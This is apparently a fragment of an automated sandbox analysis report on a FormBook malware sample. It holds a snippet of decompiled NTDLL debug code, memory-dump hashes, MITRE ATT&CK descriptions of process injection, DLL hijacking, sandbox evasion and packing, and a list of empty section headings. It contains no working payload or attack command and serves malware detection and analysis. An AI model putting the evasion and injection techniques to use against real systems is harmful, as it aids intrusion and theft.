				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04445720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0444fdda
0x0444fde2
0x0444fde5
0x0444fdec
0x0444fdfa
0x0444fdff
0x0444fe0a
0x0444fe0f
0x0444fe17
0x0444fe1e
0x0444fe19
0x0444fe19
0x0444fe19
0x0444fe20
0x0444fe21
0x0444fe22
0x0444fe25
0x0444fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0444FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0444FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0444FE2B

Memory Dump Source

Source File: 0000000A.00000002.487880611.0000000004390000.00000040.00000001.sdmp, Offset: 04390000, based on PE: true

Associated: 0000000A.00000002.488104702.00000000044AB000.00000040.00000001.sdmp Download File
Associated: 0000000A.00000002.488115015.00000000044AF000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 022f44675eb112e44263942207b182b02400e4e14e7dc7f180ea1db93c86dd99
Instruction ID: faa3c105fbc7f86df65f719adb7f37c90d4479387c2064302ea319cd2376e839
Opcode Fuzzy Hash: 022f44675eb112e44263942207b182b02400e4e14e7dc7f180ea1db93c86dd99
Instruction Fuzzy Hash: E7F0F632240201BFFF201A45DC06F23BB5AEB84731F240316F728566E1EA62F93096F4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report wREFu91LXZ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

Code Manipulations